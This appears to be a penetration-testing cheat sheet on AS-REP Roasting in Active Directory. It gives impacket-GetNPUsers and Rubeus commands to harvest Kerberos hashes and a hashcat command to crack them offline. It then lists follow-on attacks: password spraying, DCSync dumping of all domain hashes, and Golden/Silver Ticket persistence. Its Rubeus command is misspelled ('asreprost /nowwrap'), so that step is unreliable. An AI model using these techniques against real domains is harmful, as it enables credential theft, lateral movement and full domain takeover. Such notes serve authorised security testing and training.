AS-REP Roasting
About The Attack
AD has a user attribute Do not require Kerberos preauthentication (DONT_REQ_PREAUTH)
, if this is enabled AD does not validate the encrypted timestamp and skips the preauthentication, and sends AS-REP to the request, The TGT (AS-REP response) is encrypted with the user’s NTLM hash (derived from their password).
Since an attacker can get this encrypted blob without authentication, it can be brute-forced offline.
Performing Attack
Gear Up (Prereqs)
- Domain Controllers IP
- User:Pass for authentication
Using Impacket-GetNPUsers
This command will be used when launching the attack from the kali linux machine
impacket-GetNPUsers -dc-ip <DC-IP> -request -outputfile hashes.asreproast domain.com/user
user
is the username which you have credential to, For this attack you have 2 options either you can pass the list of user name -usersfile users.txt
for which you want to perform the AS-REP Roast or the above method in which Impacket-GetNPUsers
enumerate users after authentication.
Using Rubeus
This command will be used when you have a windows machine in the domain
rubeus.exe asreprost /nowwrap
Crack the Collected Hash
sudo hashcat -m 18200 hashes.asreproast /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force
We can also use custom rule or any other suitable wordlist.
Further Actions
Below are some of the use cases after successful caracking of the hash
Credential Reuse
- Password Spraying --> SMB/RDP/WinRM
- LDAP/Kerberos --> Enumerate Further
- VPN/Outlook web Access/ Citrix
Privilege Escalation
If the account belongs to :
- Domain Admins / Server Operators / Account Operators → instant escalation.
- Service Accounts (common) → pivoting into Kerberoasting, Silver Tickets, or lateral movement.
- Users with local admin rights → move laterally via SMB/PSExec/WinRM.
Chaining with Other Attacks
- From AS-REP → Kerberoasting.
If the account cracked has SPNs, request service tickets and roast them.
- From AS-REP → DCSync.
If the cracked account has replication privileges, dump all domain hashes.
- From AS-REP → Persistence.
If it’s a privileged service account, create Golden/Silver Tickets for long-term persistence.